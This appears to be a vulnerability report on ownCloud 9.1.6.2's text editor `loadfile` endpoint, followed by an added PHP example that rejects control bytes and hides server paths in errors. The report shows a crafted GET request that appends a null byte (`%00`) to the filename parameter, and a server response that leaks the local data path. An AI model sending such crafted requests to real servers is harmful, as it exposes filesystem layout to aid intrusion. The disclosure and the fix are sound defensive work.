Hi,

we've discovered that the function `loadfile` from the texteditor (stock ownCloud 9.1.6.2) can be used to make owncloud reveal the local path to the files stored for the user by requesting a file with a null byte (encoded as `%00`):
```
GET /apps/files_texteditor/ajax/loadfile?filename=invalid.txt%00&dir=%2F HTTP/1.1
Host: owncloud.invalid:5443
[...]
```
The server's response then includes the local path:
```
HTTP/1.1 400 Bad request
Server: nginx/1.10.3 (Ubuntu)
Date: Mon, 07 Aug 2017 12:07:11 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 171
[...]
{"message":"Following symlinks is not allowed ('\/var\/www\/owncloud\/data\/user1\/files\/invalid.txt\u0000' -\u003E '' not inside '\/var\/www\/owncloud\/data\/user1\/')"}
```
I apologize if this is the wrong repository to report this issue to, but I did not find any better. Please let me know if you need any additional information.
Thanks!
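One way to close this kind of leak, as an added example that is not part of the original report and is not ownCloud's code: reject control bytes in the client-supplied name before any filesystem call, and return only fixed error strings while the detailed message goes to the server log. The function names, the `filecontents` key and the sample data directory are assumptions made for illustration.

```php
<?php
declare(strict_types=1);

// Hypothetical helpers (not ownCloud code): validate a client-supplied file
// name and build an error response that never echoes server-side paths.
final class ClientInputException extends RuntimeException {}

function resolveUserFile(string $dataDir, string $dir, string $filename): string
{
    // Reject NUL and other control bytes before any filesystem call sees them.
    if (preg_match('/[\x00-\x1f\x7f]/', $dir . $filename) === 1) {
        throw new ClientInputException('Invalid file name');
    }
    $base = realpath($dataDir);
    if ($base === false) {
        throw new RuntimeException("Data directory missing: $dataDir");
    }
    $real = realpath($base . '/' . trim($dir, '/') . '/' . $filename);
    // realpath() is false for missing files; anything outside $base is refused.
    $prefix = $base . DIRECTORY_SEPARATOR;
    if ($real === false || strncmp($real, $prefix, strlen($prefix)) !== 0) {
        throw new ClientInputException('File not found');
    }
    return $real;
}

function loadFileResponse(string $dataDir, string $dir, string $filename): array
{
    try {
        $path = resolveUserFile($dataDir, $dir, $filename);
        return ['status' => 200, 'body' => ['filecontents' => file_get_contents($path)]];
    } catch (ClientInputException $e) {
        // The message is one of the fixed strings above, so it is safe to return.
        return ['status' => 400, 'body' => ['message' => $e->getMessage()]];
    } catch (Throwable $e) {
        // Full detail (which may contain local paths) goes to the server log only.
        error_log('loadfile failed: ' . $e->getMessage());
        return ['status' => 500, 'body' => ['message' => 'Internal error']];
    }
}

// Constructed sample data mirroring the request in the report.
$files = sys_get_temp_dir() . '/example-data-user1/files';
@mkdir($files, 0700, true);
file_put_contents($files . '/notes.txt', "hello\n");
echo json_encode(loadFileResponse($files, '/', "invalid.txt\0")), "\n";
echo json_encode(loadFileResponse($files, '/', 'notes.txt')), "\n";
```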